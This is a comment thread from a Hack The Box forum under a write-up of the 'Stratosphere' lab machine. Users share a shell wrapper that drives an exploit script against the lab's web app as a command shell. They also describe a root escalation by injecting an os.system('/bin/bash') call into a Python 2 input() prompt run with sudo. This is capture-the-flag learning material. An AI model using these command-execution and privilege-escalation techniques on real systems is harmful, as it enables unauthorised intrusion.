Stratosphere write-up

Comments

  • Great writeup :+1:
    I followed almost the same route but in order to make the filesystem enumeration a bit easier process, I wrote a small script to make things easier:

    #!/bin/sh
    
    url='http://10.10.10.64/Monitoring/example/Welcome.action'
    
    while true ; do
        read -p '[cmd]: ' cmd
        if [ ! -z "$cmd" ]
        then
            python 41570.py $url "$cmd" | while read line ; do
                echo $line
            done
        fi
    done
    

    It still is a non-interactive shell but at least is easier than typing the above command :)
    BTW this was my favorite box so far!!

    game0ver

  • edited September 2018

    I found another way to get root, as the PoC found here:

    https://medium.com/@GallegoDor/python-exploitation-1-input-ac10d3f4491f

    if we insert this command in the very first question:

    ____import____('os').system('/bin/bash')

    we get root shell, but only if we execute it with the version 2 of python

    sudo /usr/bin/python2 /home/richard/test.py

  • @paciock said:
    I found another way to get root, as the PoC found here:

    https://medium.com/@GallegoDor/python-exploitation-1-input-ac10d3f4491f

    if we insert this command in the very first question:

    ____import____('os').system('/bin/bash')

    we get root shell, but only if we execute it with the version 2 of python

    sudo /usr/bin/python2 /home/richard/test.py

    Thats because input = eval(raw_input) in python2

    fasetto

  • edited September 2018
    Thanks guys,
    Those are nice ways too :)

    Hack The Box

    Don't let the box pwn you!!

Sign In to comment.